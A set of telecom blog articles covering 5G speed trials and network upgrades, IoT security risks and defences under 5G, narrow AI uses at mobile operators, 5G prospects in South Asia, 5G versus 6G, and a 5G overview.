Russia is also running tests. In April 2017, MTS conducted a series of tests at the Otkritie Arena stadium in Moscow. A base station operating in the 14.5-15.3 GHz range transmitted a signal to a moving prototype smartphone at speeds up to 25 Gbit/s, enough to download an hour-long HD movie in less than 3 seconds.

Two months later, Megafon together with Huawei updated the speed record, reaching 35 Gbit/s. At their forum booth, the companies demonstrated a 5G base station in TDD mode in the 70 GHz (E-Band) frequency range with a bandwidth of 2 GHz.

After the publication of the bandwidth test results, the Internet community began an active discussion of the 5G competition with the “wired” broadband and Wi-Fi operators. A user will ask: “Why do I need wires when wireless access is several times faster?”

Technical experts from various organizations give counter-arguments on the relevant Internet forums:

  • The frequencies used over the air, the channel width and the number of clients all impose restrictions on wireless base stations, especially in TDD mode.
  • Radio is a shared medium and, unlike fiber-optic or copper cable, gives no guarantees of speed or performance.
  • Operators' cells also require radio links to communicate with data centers and with each other.
  • LTE already delivers speeds of more than 100 Mbit/s, and no mass outflow from wired access is observed.
  • There are not many routers for LTE distribution, and configuring a “modem + wireless router” bundle is too complicated for most users.

Specialists in radio engineering emphasize that these speed records were achieved at high frequencies of 15 and 70 GHz, while today's cellular networks operate in ranges from 453 to 2690 MHz. As a result, current client mobile devices will not be able to work in 5G networks at the declared speeds. And the telecom operators? They will need to free up satellite frequency bands.

Hardware Replacement
Telecommunications operators will be forced to make large-scale changes in the structure of their networks. To achieve the stated speeds on the cell towers, it will be necessary to replace the base stations and antennas, as well as PPC (equipment of radio bridges between the towers). It is expected that additional masts of cellular communications will be installed.

The most ambitious and costly changes will occur within the network of operators. The usual infrastructure of the mobile operator, shown in Figure 3, will soon become obsolete, and it will be replaced by a new one.

It is understood that the core of the network will require updating of elements such as BRAS, DPI, billing, CG-NAT, DNS and DHCP servers. There are several reasons:

  • the previously declared access speeds;
  • the introduction of a dual stack of IPv4 and IPv6, long promised in support of the Internet of Things.

It should also be noted that a change in subscriber identification is expected. The so-called 5G Subscription Permanent Identifier (according to the concept) will absorb the IMSI and be supplemented with new network identifiers such as a MAC address. The old IMEI will be replaced by the PEI (Permanent Equipment Identifier).

5G networks and virtual reality technologies open up new possibilities across many activities, whether video games, broadcasts of concerts and sports, medical operations or much more. While these are clear advantages for the 5G subscriber, telecom operators face new problems and tasks, which they can already begin solving by replacing the equipment and software of their data networks.

IoT Security Threats and How to Handle Them


What are the biggest IoT security risks and challenges

High-speed 5G mobile networks not only connect people more efficiently, but also enhance the interconnection and control of machines, objects and devices. High data rates, low latency and high capacity are good for both consumers and businesses. But as one early adopter of 5G has found, these benefits also carry significant new security risks.

Global home-electronics manufacturer Whirlpool has already begun building out 5G at one of its plants. The company currently uses IoT devices for predictive maintenance, environmental control and process monitoring over its existing local Wi-Fi network, but the introduction of 5G will enable autonomous forklifts and other vehicles not possible with Wi-Fi.

“The plant is heavily metal,” said Douglas Barnes, Whirlpool's North American IT and OT manufacturing infrastructure and applications manager. “Wi-Fi reflects off the metal. We built a mesh Wi-Fi network in the factory, but there is simply too much metal. 5G passes through walls and is not reflected by metal.”

“When 5G is deployed at the plant, Whirlpool will see a breakthrough,” he says. “We will be able to introduce true autonomous vehicles across the facility, covering everything from maintenance and delivery to manufacturing operations. This business case is significant and can provide substantial cost savings. The 5G rewards are great.”

Barnes said testing has already been completed to verify normal operation of the autonomous vehicles. The budget will be allocated starting this month, and vehicles will run on 5G by the end of the year. “If the results are good, the autonomous-vehicle business case will work everywhere else,” Barnes said.

Barnes is well aware of the cybersecurity issues already occurring in the enterprise and of how they will be amplified by the transition to 5G. Whirlpool worked with its 5G partner AT&T to address the concerns. “I wrestle with security issues every day. Before we started, the first thing we talked about with AT&T was how to build a secure network.”

The following are seven key areas that companies such as Whirlpool should consider when developing a 5G implementation plan for IoT.

1. 5G Network Traffic Encryption and Protection.

With 5G, the amount of traffic flowing through these networks increases dramatically with the number of intelligent devices connected to the network. According to Gartner, the number of enterprise and vehicle IoT devices will reach 5.8 billion, up 21 percent next year, from 4.8 billion, the expected number of IoT endpoints this year. For attackers, this means a much richer network of targets than it is today.

According to Barnes, Whirlpool will configure the 5G antennas to encrypt all 5G traffic and accept only authorized traffic. “When we add a device, we configure it as an acceptable device in 5G,” he said. The network does not accept traffic from devices that are not on the whitelist, and all traffic is encrypted. “If someone picks up the signal, there is very little they can do with it.”

Barnes said that when traffic leaves the local network and is sent over public 5G or the Internet, the content is protected by a secure VPN tunnel: “We've done this in advance in case we need to communicate with the outside using 5G.”
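The allow-list idea described above can be sketched at its simplest: traffic is accepted only from registered device identities, and everything else is dropped. This is an illustrative toy, not Whirlpool's actual configuration; the device IDs are invented:

```python
# Hypothetical registry of devices provisioned onto the private 5G network.
ALLOWED_DEVICES = {"forklift-01", "sensor-env-17", "camera-dock-3"}

def accept(packet: dict) -> bool:
    """Accept a packet only if its sender is on the allow-list."""
    return packet.get("device_id") in ALLOWED_DEVICES

print(accept({"device_id": "forklift-01", "payload": b"telemetry"}))  # True
print(accept({"device_id": "unknown-99", "payload": b"probe"}))       # False
```

In a real deployment the identity check happens at the radio and core layers (SIM credentials rather than a dictionary lookup), but the default-deny principle is the same.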

2. Protect and Isolate Vulnerable Devices:

The next potential weakness is the devices themselves. “There is weak security awareness throughout the industry,” Barnes said. Industrial equipment in particular often runs its own operating system and cannot be patched, or patching is prohibited under the license. “It's not designed with patches in mind,” Barnes said.

Jonathan Tanner, senior security researcher at Barracuda Networks, said that the vast majority of IoT security mistakes haven’t been fixed, and some devices have problems that cannot be fixed by a firmware update, or that there is no mechanism to update the firmware. Even if device manufacturers add security to the next generation of devices, the older, unsafe devices will still be used.

Tanner said some manufacturers disregard this and ignore the security researchers who point out vulnerabilities. “There are cases where companies that make vulnerable devices go out of business. In that case, the vulnerable devices are left untouched.”

What should companies do with insecure IoT devices? Whirlpool's Barnes said network isolation, along with other network-security technologies, can help. “Whirlpool uses a two-tiered approach. The first layer is network security, which monitors all traffic, and the second layer is protocol-based security, looking for malicious activity embedded in the protocol through deep packet inspection,” Barnes said.

On top of these layers, general security hygiene applies: patching immediately, running regular security audits on all devices, and inventorying every device on the network.
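The second, protocol-based layer can be illustrated as signature matching over packet payloads. The signatures below are invented examples of the kind of patterns deep-packet-inspection rules look for, not a real ruleset:

```python
import re

# Illustrative payload signatures: a device fetching remote code, or a
# shell invocation embedded in what should be plain telemetry.
SIGNATURES = [
    re.compile(rb"(?i)\b(wget|curl)\s+http"),
    re.compile(rb"/bin/sh"),
]

def inspect(payload: bytes) -> bool:
    """Return True if the payload matches a known-suspicious pattern."""
    return any(sig.search(payload) for sig in SIGNATURES)

print(inspect(b"GET /status HTTP/1.1"))          # False: ordinary traffic
print(inspect(b"wget http://evil.example/bot"))  # True: flagged
```

Production DPI engines decode the actual industrial protocols rather than grepping bytes, but the principle, inspecting content instead of just source and destination, is what the second tier adds over plain network monitoring.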

3. Prepare for Larger DDoS attacks

In general, 5G is no less secure than previous generations of wireless technology. “5G brings new security features that aren't actually available in 4G or 3G,” said Kevin McNamee, head of the Nokia Threat Intelligence Lab. “In 5G, the entire control plane is moved to a Web-services type of environment, which is strongly authenticated and very secure.”

This improvement is offset by increased opportunities for botnets, McNamee said. “In 5G, the bandwidth available to devices is significantly increased. As bandwidth increases, IoT bots will increase.”

The increased bandwidth can be used to find more vulnerable devices and spread infections, increasing the number of devices a botnet can recruit. Like Whirlpool, many other kinds of organizations, including government agencies, use IoT devices heavily, and once 5G is deployed they will be able to place devices in remote, difficult-to-maintain locations. “A lot of sensors record everything from weather to air quality to video feeds,” says Cameron Camp, co-chairman of the Oregon Wireless Internet Service Providers Union. “There are a lot of new machines that are likely to be hacked and botnetized. It will be difficult to find and respond to hacks.”

IoT devices also typically remain in use for a long time: users see no reason to replace a device that performs its function well. Attackers prefer a stealthy approach so as not to draw attention. Even if a patch is released, or a manufacturer ships a more secure version of the device, it is useless if customers do not replace what they have.

Many smart IoT devices, meanwhile, run a full operating system such as embedded Linux, allowing them to behave almost like ordinary computers. Infected devices can therefore be used to host illegal content, malware, command-and-control data and other systems and services useful to attackers. Users do not think of these devices as computers that need antivirus, patches or updates, and many IoT devices keep no logs of inbound and outbound traffic. This makes botnets even harder to eradicate, because attackers can stay active without being caught.

Eventually, all three threat factors increase: the number of devices that can be exploited, the bandwidth available for botnet proliferation, and the bandwidth available for devices to launch DDoS attacks. Many devices are still unprotected and some cannot be patched at all, so in a 5G environment companies must be prepared for much larger DDoS attacks than today's.

4. Switching to IPv6 May Replace Private Internet Addresses with Public Addresses
As the number of devices increases and communication speeds improve, companies may want to use IPv6 instead of the currently common IPv4. IPv6, with its longer addresses, has been an Internet standard since 2017.

The IPv4 address space allows a maximum of about 4.3 billion addresses, which is not enough. Some registrars have faced address shortages since 2011, and organizations began their transition to IPv6 in 2012. Yet according to data from The Internet Society, fewer than 30 percent of Google users currently reach the Google platform via IPv6.

Nokia's McNamee said that many organizations, nearly all home devices and many cell-phone networks use private IPv4 addresses instead of IPv6: “Private IPv4 addresses are not exposed to the Internet, providing natural protection from attacks.”

As the world moves to 5G, carriers will have to adopt IPv6 to support billions of new devices. But if a carrier assigns public rather than private IPv6 addresses, the devices are exposed to the Internet. McNamee said this is not a flaw in IPv6 or 5G, but companies that move devices from IPv4 to IPv6 can inadvertently leave them in public address space.
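The private-versus-public distinction drawn above can be checked programmatically; Python's standard `ipaddress` module classifies both IPv4 and IPv6 addresses, which is a quick way to audit whether migrated devices landed in public space:

```python
import ipaddress

def exposure(addr: str) -> str:
    """Classify an address as private (unreachable from the Internet) or public."""
    return "private" if ipaddress.ip_address(addr).is_private else "public"

for a in ["10.0.0.5", "8.8.8.8", "fd00::1", "2606:4700::1111"]:
    print(a, exposure(a))
# 10.0.0.5 (RFC 1918) and fd00::1 (IPv6 unique local) are private;
# the other two are globally routable.
```

A simple loop like this over a device inventory would surface exactly the migration mistake McNamee warns about: devices that used to sit behind RFC 1918 space ending up with globally routable IPv6 addresses.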

5. Increased Attack Surface due to Edge Computing:

Interest in edge computing is growing among companies looking to reduce latency and improve performance across their distributed infrastructure. When 5G is deployed, the communication capabilities of endpoint devices are enhanced, further increasing the benefits of edge computing.

At the same time, edge computing dramatically increases the potential attack surface. Companies that have not yet started their transition to a zero-trust network architecture should adopt that architecture before investing heavily in edge-computing infrastructure. When building it, security should be treated as the primary consideration, not an afterthought.

6. New IoT Companies Focus on Being First, Not on Security:

When the IoT gold rush begins, new players will enter the market and existing ones will rush new devices out ahead of schedule. Barracuda's Tanner says there are already more IoT devices than security researchers can examine for vulnerabilities, and new manufacturers will add new cycles of security mistakes.

Tanner notes that because the same mistakes keep recurring, the number of vulnerabilities reported in IoT devices is not decreasing but increasing. “There is not enough learning from incidents at other companies in the industry.”

“Companies don't care about security,” says Joe Cortes, who leads penetration testing at A-lign Compliance and Security with a focus on corporate network intrusions. “Earlier this year, I bought five smart-lighting devices, and I could access four of them from outside the home. The test mode embedded in the devices had been shipped by the vendor without being removed.”

Cortes said every company wants to be first to market, and many use ready-made platforms such as embedded Linux to ship devices as quickly as possible. “I recently got hold of IoT malware that can bring a device down with seven lines of code,” Cortes said, adding that manufacturers who do not harden their devices are vulnerable.

For example, an attacker could use such malware to shut down a plant or critical infrastructure, or hold a company's systems hostage and demand a ransom. “That's not happening yet, because 5G is not widely deployed,” Cortes said. “As 5G adoption increases and IoT grows, exploitation of industrial systems, such as in manufacturing, is likely to increase significantly.”

7. Everyone is Responsible for IoT security:

The biggest obstacle to IoT security is psychological, not technological: nobody wants to take responsibility, and everyone wants to pass it to someone else. Buyers accuse vendors of not making devices secure; vendors blame buyers for choosing cheap, insecure products. In the 5G world, this avoidance of responsibility for IoT security will have even greater consequences.

In a Radware survey last year, 34 percent of respondents said responsibility for IoT security rests with device manufacturers, 11 percent with service providers, 21 percent with individual consumers, and 35 percent with business organizations. “In other words, there is no consensus,” said Mike O'Malley, vice president of strategy at Radware. He added that consumers lack the knowledge and skills, companies do not hire enough people, and manufacturers are so numerous and varied that they are difficult to regulate.

Companies can hire service providers to take some of the responsibility off, but that doesn’t solve the problem of unprotected consumer devices, passive manufacturers in change, and the absence of consistent global regulations and enforcement.

Everyone should be responsible for IoT security. Buyers should ensure that their products do not use a default password or test mode, that communications are encrypted and authenticated, and that devices are regularly patched and updated. Vendors should stop selling unprotected devices and consider security at the start of the product design process, rather than adding features later.

Artificial Intelligence in Telecom – From Hype to Reality – AI


Surprising Ways Telecom Companies Use Artificial Intelligence

AI has had plenty of hype in the media, among researchers and from vendors. Innovative organizations are putting a lot of effort into AI research to reap its full benefits.

We all know about Sophia, a social humanoid robot developed by the Hong Kong-based company Hanson Robotics. She looks quite human-like and has appeared on many talk shows; she has even been granted citizenship in Saudi Arabia as the first AI-based humanoid robot. She is portrayed as intelligent, but in reality her intelligence is very basic. She can read a script, deliver a speech on stage and answer pre-programmed questions, but ask her a question outside the script and she cannot answer. Why is that? Where is the gap?

The answer lies in a basic distinction in how AI is implemented.

Artificial General Intelligence

Machines with almost the same level of intelligence as humans are what AGI products are expected to deliver. This is what we are all waiting for.

Artificial Narrow Intelligence

Machines with the ability to perform specific tasks extremely well. These are computers trained to do simple, narrow tasks, only more efficiently than humans. ANI-based products are what industry mostly uses today, e.g. a machine trained to identify objects in images.

A computer that can identify a brain tumor cannot detect a tiger in a picture, because it has not been trained to.

And that is the kind of AI that organizations such as telecom operators are trying to implement. 5G, IoT and big data will be handled by narrow AI models performing small tasks efficiently and fast.

Operators can train AI models that take input from big data and, after processing, produce the expected insights about customers. Mobile operators are also training models on network alarms to predict whether a failure will occur. We simply feed this data to the AI model so that it learns and gives the desired output; it also learns relationships, so that when a related new input arrives it can predict the answer. Similarly, when a new customer is added, the model can predict whether that client will churn or not.
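A deliberately tiny sketch of the churn idea: learn the average feature profile of churned versus retained customers, then classify a new customer by whichever profile is nearer. The features and data below are invented for illustration; real operators would use far richer data and proper machine-learning models:

```python
# Nearest-centroid churn sketch with invented data:
# features are [monthly_spend, support_calls, months_as_customer].

def centroid(rows):
    """Average each feature across a group of customers."""
    n = len(rows)
    return [sum(col) / n for col in zip(*rows)]

def distance_sq(a, b):
    """Squared Euclidean distance between two feature vectors."""
    return sum((x - y) ** 2 for x, y in zip(a, b))

churned  = [[20, 8, 3], [25, 6, 5], [18, 9, 2]]
retained = [[60, 1, 24], [55, 2, 36], [70, 0, 18]]

c_churn, c_stay = centroid(churned), centroid(retained)

def predict_churn(customer):
    """True if the customer's profile is closer to past churners."""
    return distance_sq(customer, c_churn) < distance_sq(customer, c_stay)

print(predict_churn([22, 7, 4]))   # True: resembles past churners
print(predict_churn([65, 1, 30]))  # False: resembles loyal customers
```

The same learn-a-pattern-then-score-new-inputs shape applies to the alarm example: replace customer features with alarm counts per cell and the label with "failure within N hours".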

This is a very basic application of AI in the mobile telecom industry today.

One more interesting and quite effective application of AI in telecom is dynamic carrier allocation.

An Artificial Narrow Intelligence model can add or remove additional carriers based on what it has learned from previous weeks' capacity-usage trends. No more manual allocation and wasted resources.
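The carrier-allocation logic can be sketched as a simple rule: given the peak load predicted from previous weeks' trends, pick the smallest number of carriers that keeps per-carrier load under a threshold. The 80% threshold and the load figures are assumed values for illustration:

```python
CAPACITY_PER_CARRIER = 0.8   # keep each carrier below 80% load (assumed policy)

def carriers_needed(predicted_load: float) -> int:
    """Smallest carrier count keeping per-carrier load under the threshold.

    predicted_load is expressed in units of one carrier's full capacity.
    """
    n = 1
    while predicted_load / n > CAPACITY_PER_CARRIER:
        n += 1
    return n

# Predicted peak loads learned from previous weeks' trends:
print(carriers_needed(0.5))  # 1 carrier is enough
print(carriers_needed(2.3))  # 3 carriers: 2.3 / 3 is about 0.77, under 0.8
```

The learning part of the real system lives in producing `predicted_load` from historical traffic; the allocation step itself can stay this simple.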

Another practical example of machine learning in telecom is:

Automated Customer Care:

Machines are trained to identify patterns in ticket text and predict the underlying problem, in order to offer better solutions.

This is pure automation: quick, competent customer support.
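A minimal sketch of pattern-based ticket routing, with invented categories and keywords; production systems would use trained text classifiers rather than keyword rules, but the input-to-category shape is the same:

```python
# Illustrative routing rules: category -> trigger phrases.
RULES = {
    "billing": ["overcharged", "invoice", "refund"],
    "network": ["no signal", "slow", "dropped"],
    "account": ["password", "login", "locked out"],
}

def classify(ticket: str) -> str:
    """Route a ticket to the first category whose keywords appear in it."""
    text = ticket.lower()
    for category, keywords in RULES.items():
        if any(k in text for k in keywords):
            return category
    return "unknown"

print(classify("I was overcharged on my last invoice"))   # billing
print(classify("My internet is very slow since Monday"))  # network
```

The "unknown" bucket is exactly where the data-volume problem discussed below bites: categories without enough example tickets cannot be routed confidently.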


A challenge mobile operators face at the moment is that they do not have enough samples of issues to predict accurately; only queries for which the model has high-volume data are addressed well.

These are concrete examples already in use at telecom companies today. In the near future, AI will be part of every domain, automating tasks and improving productivity, whether in the network, customer care, marketing, HR or finance.

How to Adopt AI in the Mobile Industry:

First of all, companies need to upgrade their technology stacks, infrastructure and competence to work with AI, and especially fix the first mile and last mile of AI.

The first mile means data readiness: being able to collect, store and process data so it is available for training AI models.

The last mile is the infrastructure on which AI models run, and the application of their predictions to operations.

So, to deploy AI effectively in the telecom sector, mobile operators need to first refine enough big data and then focus on applying the outputs in business operations.

Key barriers to solve, and must-haves, for AI readiness:

  • Agile data-access processes.
  • An experimentation platform with the right tools.
  • A culture that allows experimentation and failure.
  • Collaboration between domain experts and AI experts / a cross-functional operating model.

5G in South Asia: Opportunities & Challenges


Imagine 5G in South Asia, home to 1.891 billion people, about one fourth of the world's population, making it both the most populous and the most densely populated geographical region in the world.

Just a year after introducing 4G, the telecom sector in South Asia is turning its attention to the era of 5G. While the gap between these two successive generations of mobile technology seems quite narrow, 5G's over-arching impact beyond voice and data has made it a must-have tool to keep South Asia relevant in the Fourth Industrial Revolution (Industry 4.0).

Unlike the earlier generations, 5G can bring more than incremental change to the emerging economies of South Asia. Its underlying architecture has the potential to enable the next wave of productivity and innovation across the subcontinent, thanks to its gigabit speeds and improved network performance and reliability.

However, some of the most talked-about 5G use-cases, such as autonomous vehicles and robotic surgery, might not be applicable in the context of South Asia, because such futuristic use-cases require an advanced market structure and supporting digital and economic infrastructure. Rather, an adapted, contextual 5G, driven largely by digitization and automation needs in the government and business sectors, would be more appropriate for the region.

5G Overview
Unlike earlier generations of mobile networks, 5G represents a significant shift in the telco industry’s focus away from voice and towards mobile broadband and industrial applications. In other words, 5G will be use-case driven. Instead of rolling out a tower and offering voice and data services right away, 5G will solve problems across a range of sectors, including transportation, health, manufacturing and agriculture, using a combination of devices, connectivity and applications.

5G use cases can be divided into three categories: a) enhanced Mobile Broadband, b) massive Machine-Type Communications, and c) critical communications. Beyond these, 5G has the potential to tailor network requirements to each of these use-case categories within the same network.
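As a sketch, the three categories and the headline figures this article quotes for them can be captured in a small lookup table; the `pick_slice` helper, which matches on metric names only, is an illustrative simplification and not part of any 5G specification.

```python
# The three 5G use-case categories with headline requirements quoted
# in this article. The matching rule below is a deliberate
# simplification for illustration.
SLICE_REQUIREMENTS = {
    "eMBB":  {"peak_rate_gbps": 10, "per_user_mbps": 100},
    "mMTC":  {"devices_per_km2": 1_000_000, "battery_life_years": 10},
    "URLLC": {"latency_ms": 0.5, "reliability": 0.999999},
}

def pick_slice(needs):
    """Return the first category whose requirement set covers every
    metric the application cares about (name match only)."""
    for name, reqs in SLICE_REQUIREMENTS.items():
        if all(metric in reqs for metric in needs):
            return name
    return None

slice_for_sensors = pick_slice({"devices_per_km2": 50_000})  # "mMTC"
slice_for_robots = pick_slice({"latency_ms": 1.0})           # "URLLC"
```

Tailoring these requirement sets within one physical network is exactly what slicing provides; a production system would, of course, also check the requested values, not just the metric names.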

Enhanced Mobile Broadband (eMBB)

eMBB is designed to provide an improved, “unlimited” mobile experience for consumers. Superfast 5G networks with peak data rates of >10 Gbps will let consumers view rich content in more places, supporting the streaming of live events and high-resolution media. Network capacity 10,000 times that of today’s networks will support more users, even in crowded areas such as large public events, and provide at least 100 Mbps of throughput per user at peak times. eMBB will likely be the focus of early 5G deployments, as it can immediately support the growing communications requirements of an emerging digital economy like South Asia’s.

Massive Machine Type Communication (mMTC)

mMTC will support widespread, dense deployment of sensors and other network-connected devices, enabling massive Internet of Things (IoT) deployments such as asset tracking, smart agriculture, smart cities, energy monitoring, smart homes and remote monitoring. mMTC will significantly reduce power requirements (battery life of up to 10 years) and provide flexible coverage across different spectrum bands, with the ability to support over 1 million devices per square kilometer.
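The 10-year battery-life target can be translated into a power budget with simple arithmetic: capacity divided by total hours gives the average current a sensor may draw. The 2000 mAh capacity below is an assumed example value, not a figure from the text.

```python
# What a 10-year battery life implies for an mMTC sensor: the average
# current a battery of given capacity can sustain over that period.
# The 2000 mAh capacity is an assumed, illustrative value.
def sustainable_current_ma(battery_mah, years):
    hours = years * 365 * 24
    return battery_mah / hours

avg_ma = sustainable_current_ma(2000, 10)  # ~0.023 mA average draw
```

An average draw in the tens of microamps is why mMTC radios rely on deep sleep cycles and narrowband transmission.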

Ultra Reliable Low Latency Communication (URLLC)

URLLC will take human-to-machine interaction to the next level, offering sub-millisecond latency and ultra-reliable (i.e., no more than 1 failure in a million) communications networks supporting the delivery of critical communications, playing a key role in the technology ecosystem behind autonomous vehicles, smart grids, remote patient monitoring and telehealth, and industrial automation.

5G Opportunities for South Asia

The 5G opportunities can be divided into three broad segments: consumer, business and government.


Consumer

Super-fast, yet affordable 5G networks will bring new services and experiences to South Asia's 1.891 billion people, about one fourth of the world’s population. The first wave of 5G deployments is envisaged to be based primarily on eMBB use-cases and will provide an unlimited mobile and home broadband experience for consumers, far better than today’s 4G and Wi-Fi connectivity. Through ultra-high-speed, low-latency connections, consumers will be able to use a broad range of data-hungry services, such as HD streaming and gaming, seamless video conferencing and sharing, and augmented reality (AR) and virtual reality (VR) services. All of this is expected to fit within the same monthly budget, thanks to an at least tenfold reduction in the cost of data from 4G to 5G.


Business

The eMBB services will also help the region's fledgling SMEs and corporates migrate to the cloud, supporting their various cloud-based software, unified communication and conferencing needs. Using mMTC, companies in the RMG, pharmaceuticals and FMCG sectors will be able to deploy assembly-line and supply-chain automation techniques that significantly increase their efficiency, while applications like asset tracking, logistics and worker-safety monitoring will help businesses improve productivity.


Government

Perhaps the most transformative impact of 5G in South Asia will be in the government sector. 5G-powered smart cities can implement use-cases like smart parking, smart waste management, smart street lights and smart public safety, enabling smarter decision-making and planning to improve citizens' quality of life and increase productivity.

5G can greatly accelerate the implementation of smart grids and utilities in South Asia, enabling use-cases like smart metering, service-quality monitoring, fault localization, automation and control, infrastructure management and demand management. Utilities can use these services to balance demand and supply, improve service quality and reliability, and ensure precise billing and revenue collection. Customers, in turn, can monitor and manage their consumption in near real time, pay bills, and receive alerts and outage notifications on their smartphones.

Apart from the above, 5G can help governments implement digitization and automation projects across sectors such as health, education and agriculture.

Key Challenges for 5G deployment in South Asia:

Despite the many potential benefits, significant challenges exist to implementing 5G and getting the most out of it. Operators are skeptical about the business case, given the high levels of investment needed to deploy 5G networks and its dependence on the readiness of the device and app ecosystems. In such a scenario, action from policy-makers can make a great difference in enabling a robust 5G investment case.

Some of these key challenges are outlined below:

Spectrum: The key features of 5G, i.e. speed, reliability and capacity, come mainly from more, and new, bands of spectrum. The price and allocation modality of spectrum will play a major role in the business cases of 5G operators. At current spectrum prices, operators will hardly see a business case for immediate adoption of 5G in South Asia. Moreover, considerable clean-up and harmonization are required in the 700 MHz, 3.5 GHz and 26-28 GHz bands to make them available for 5G deployment. Affordable access to this spectrum and a clear roadmap of its availability are key to encouraging investment in 5G.

Infrastructure: Along with spectrum, easy and affordable access to infrastructure (poles and towers, antennas, fiber networks) is critically important to ensure 5G capacity and coverage. Hence, attention needs to be paid to reforming related guidelines and arrangements so that all players can offer their complementary assets and capabilities under a harmonized 5G infrastructure-sharing guideline.

Policy: Unlike 2G/3G/4G, the use-case-driven 5G technology requires close engagement among device and application developer communities, government agencies and the telecom industry. The taxation regime for IoT sensors/devices and connectivity (e.g. SIM tax, VAT/SD/SC) needs to be reformed to encourage the proliferation of IoT applications. Cross-industry collaboration is required to expedite national ICT projects, such as smart city/grid/education/health initiatives, to prepare the ground for 5G-based digitalization and automation. Pragmatic policies based on international best practice also need to be put in place for cloud and data centers to cater for the ‘data tsunami’ that 5G will fuel.

Security: As 5G networks are expected to become the backbone of many critical national IT applications, such as smart cities, smart grids and healthcare, the integrity and availability of those networks will become major concerns from a national-security perspective. Because 5G depends heavily on devices and applications, the risk of major security flaws increases significantly; for example, poor firmware- and software-development processes make it easier for hackers to maliciously insert back-doors into products and harder to detect them. Hence, the necessary security and data-privacy policies and best practices, such as data encryption, device/software certification and network slicing, need to be in place.


5G is expected to play a key role in the emerging economies of South Asia, improving economic growth, enhancing citizens' experiences and creating new business opportunities. The implementation of 5G in South Asia will be quite different from the rest of the world, as the region, the most populous and most densely populated in the world, is leap-frogging from a largely analog to a digital economy, bypassing the intermediate steps.

However, significant skepticism exists regarding the investment case of 5G, which needs to be addressed by carefully crafted spectrum, infrastructure, taxation and cloud hosting policies. This can reduce business uncertainties and create an encouraging investment environment for all 5G players, including operators, infrastructure providers, device vendors, developer community, and most importantly, government and business customers.

What is The Difference between 5G and 6G?


What is 6G? 5G vs 6G, Speed & More

In simple words, 6G is widely expected to be smarter, faster and more efficient than 5G. It promises mobile data speeds up to 100 times faster than those of the 5G networks currently available in a limited number of countries, with peak rates projected on the order of 100 gigabits per second or more.

Future Technologies are Closer Than We Think | 6G

While operators are still introducing 5G networks, developers have already begun active work on sixth-generation (6G) networks. Huawei, in particular, announced that it has started research on 6G, the successor to 5G mobile networks, which are themselves not yet widespread, according to CEO Ren Zhengfei.
He said it’s in an “early phase” and there’s still “10 years to go” before commercialization.

It is now necessary to decide which frequency bands will be used and how they will be licensed to telecom companies. At the same time, the term 6G is still only a label: no single definition, let alone a standard, exists yet.

Former FCC chairman Tom Wheeler said: “I don’t care what to call it: millimeter waves, 6G or xyz. But we need to start discussions to solve these issues.”

“Nobody Knows What the 6G Standard Will Look Like”

Despite the uncertain standards, real technologies already exist. For example, Samsung recently tested wireless networks at about 7.5 Gbit/s, roughly 30 times faster than LTE and about a thousand times faster than the average fixed-broadband connection.

One fundamental difference of 6G technologies is the use of millimeter waves, which open up high-frequency bands with abundant capacity. Using such frequencies will dramatically increase connection speed, but it will also reduce propagation range and the network's ability to penetrate or bend around obstacles and folds in the terrain.

As experts put it: “Next-generation networks need to be seriously upgraded. How do you meet these requirements? You need to look into the distance. Very, very far. To infinity and even further.”

It is believed that, theoretically, the 6G standard will increase wireless speeds to 100 times those of 5G. The best and fastest fixed fiber-optic channels currently have a bandwidth of 100 Gbit/s, and 5G speeds will let users download a Blu-ray movie in a split second. Now imagine 6G.

5G standards will have to solve another problem in addition to increasing speed: in the near future, not only smartphones, tablets and computers will be connected to the Internet, but also cars, household appliances, smart-home systems and much more. Consequently, telecom companies will need to significantly increase capacity, not only in bandwidth but also in coverage. Now think about networks and applications using 6G, which would be 100 times faster than 5G.

According to Huawei, 5G networks will be fully available in 2020 for commercial use.

The process of developing Internet-access technologies continues. It seems 4G (LTE) networks only recently entered service, yet experts at Huawei are already developing wireless 5G.
It is possible that as early as 2020 there will be a shortage of network-access speed and a need for a more modern data-transfer technology, one allowing access at speeds of up to 10 Gbit/s at any point in the network. Of course, these are maximum (downlink) values; in reality, speeds will be lower, as with all previous technologies, but they will be enough to satisfy any user's requests.

5G Network Background

According to forecasts from Huawei, one of the leaders in developing and producing equipment for wireless networks (both 3G and 4G), the need for a new data-transfer technology will arise very soon, and construction of 5G networks must begin by 2020 to satisfy all subscriber demands.
In the next decade, the number of mobile Internet users will increase many times over, leading to a lack of bandwidth and an inability to provide quality service; this is why the modernization of existing data-transfer technologies is necessary.
Today, subscribers of 3rd- and 4th-generation networks receive good or acceptable service quality. As the load on base stations grows, throughput will noticeably decrease; therefore, it is necessary to expand capacity or move to a new level, giving subscribers better service at higher access speeds with the same resources.
According to the head of Huawei's Laboratory for Communication Technologies (LKT), entering the 5G market will attract many more subscribers, driven by the emergence of services that demand high bandwidth, such as video communications, which require high data rates for high-quality images and minimal delay between devices for a greater sense of presence.
5G networks, together with other existing computing technologies, will make the world even more mobile and truly accessible.


What is 5G? The Ultimate Guide Available on Internet


Everything You Need to Know About 5G

What is 5G?

Until recently, there were four generations of mobile communications in the world. Currently, operators, with the support of equipment suppliers (vendors), are actively testing the capabilities of fifth-generation networks, whose commercial expansion is expected by 2020. This is quite simple to explain: there is the so-called ten-year rule. Looking a little into the past, each new generation of mobile communications appeared about 10 years after the previous one: the first generation in the early 80s, the second in the early 90s, the third in the early 00s, and the fourth in 2009. The conclusion suggests itself that commercial 5G networks will begin to fill the world in 2020.

The fifth generation mobile communication standard (5G) is a new stage in the development of technology, which is designed to expand the possibilities of accessing the Internet through radio access networks.

The standardization of 2nd-, 3rd-, 4th- and 5th-generation mobile networks is carried out by the 3rd Generation Partnership Project (3GPP).

In 2017, 3GPP officially announced that 5G will become the official name for the next generation of mobile communications and introduced a new official logo for the communications standard.

The tasks that 5G technology is designed to solve:

  • Growth of mobile traffic
  • Growth in the number of devices connected to the network
  • Reduction of latency to enable new services
  • Shortage of frequency spectrum

5G Network Services

  • enhanced Mobile Broadband (eMBB) – ultra-wideband communication for transmitting “heavy” content;
  • massive Machine-Type Communications (mMTC) – support for the (ultra-narrowband) Internet of Things;
  • Ultra-Reliable Low Latency Communication (URLLC) – a special class of services with very low latencies.

It is obvious that in the future many more devices will be connected to the network, most of which will operate on an “always online” principle. At the same time, their low power consumption will be a very important parameter.

5G Network Requirements

  • Network bandwidth up to 20 Gbit/s downlink (i.e., to the subscriber) and up to 10 Gbit/s uplink.
  • Support for the simultaneous connection of up to 1 million devices/km².
